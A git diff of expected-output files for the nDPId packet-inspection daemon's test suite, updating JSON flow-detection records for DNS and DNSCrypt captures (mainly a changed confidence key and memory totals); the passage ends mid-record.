-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":59,"total-skipped-flows":0,"total-l4-payload-len":17861,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":148,"global_ts_msec":1560869916477} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 66/59 @@ -154,9 +154,9 @@ ~~ total active/idle flows...: 21/21 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5892567 bytes -~~ total memory freed........: 5892567 bytes -~~ total allocations/frees...: 118263/118263 +~~ total memory allocated....: 6026201 bytes +~~ total memory freed........: 6026201 bytes +~~ total allocations/frees...: 121025/121025 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 214 chars ~~ json string max len.......: 2446 chars diff --git a/test/results/dns_invert_query.pcapng.out b/test/results/dns_invert_query.pcapng.out index ff767f61b..1d1a33133 100644 --- a/test/results/dns_invert_query.pcapng.out +++ b/test/results/dns_invert_query.pcapng.out @@ -2,7 +2,7 @@ 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1618744019230} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744019230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1618744019230,"pkt":"AAAAAAAAAAEAVKCBCABFAABAAABAAEARzK6tk2yu9LtfAUf7ADUALMGVd\/wJAAAAAAEAAAAAAzIxNgI1OAMyMDIBNAAAAQABAAAAAAAA"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"216.58.202.4","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"216.58.202.4","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744019235,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1618744019235,"pkt":"AAAAAAAAAAEAVKCBCABFAAAoAABAADsR0cb0u18BrZNsrgA1R\/sAFEgWd\/yJhAAAAAAAAAAAAAA="} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1618744019230,"flow_last_seen":1618744019235,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1618744019235,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":48,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1618744019235} @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869473 bytes -~~ total memory freed........: 5869473 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003107 bytes +~~ total memory freed........: 6003107 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 781 chars diff --git a/test/results/dns_long_domainname.pcap.out b/test/results/dns_long_domainname.pcap.out index d34981d55..3be6b9db6 100644 --- a/test/results/dns_long_domainname.pcap.out +++ b/test/results/dns_long_domainname.pcap.out @@ -2,10 +2,10 @@ 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1599686652555} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1599686652555,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1599686652555,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZsREAAEAR9yLAqAGoCAgICP8fADUARcOpi1QBAAABAAAAAAAABmdtcjAyYwIxNgEwDGZoa2Zoc2RrZmhzawZ0dW5uZWwHZXhhbXBsZQNjb20AAAEAAQ=="} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1599686652578,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"thread_ts_msec":1599686652578,"pkt":"KDc3AG3IEBMx8Tl2CABFAACR3WoAAHYRlJEICAgIwKgBqAA1\/x8AfQAAi1SBgwABAAAAAQAABmdtcjAyYwIxNgEwDGZoa2Zoc2RrZmhzawZ0dW5uZWwHZXhhbXBsZQNjb20AAAEAAcAsAAYAAQAABcMALAJucwVpY2FubgNvcmcAA25vYwNkbnPATHhn+r4AABwgAAAOEAASdQAAAA4Q"} -00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":178,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1599686652578} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869518 bytes -~~ total memory freed........: 5869518 bytes -~~ total allocations/frees...: 118117/118117 +~~ total memory allocated....: 6003152 bytes +~~ total memory freed........: 6003152 bytes +~~ total allocations/frees...: 120879/120879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 475 chars ~~ json string max len.......: 819 chars diff --git a/test/results/dnscrypt-v1-and-resolver-pings.pcap.out b/test/results/dnscrypt-v1-and-resolver-pings.pcap.out index 70d818235..701c72b86 100644 --- a/test/results/dnscrypt-v1-and-resolver-pings.pcap.out +++ b/test/results/dnscrypt-v1-and-resolver-pings.pcap.out @@ -2,28 +2,28 @@ 00569{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946735705348} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAIcCf9AAL0Rd68KAAABlTjkLZX0AbsCCDw8f0cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAXcCgAgAL0Rk+4KAAABlTjkLbKaAbsGBGxVf0QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA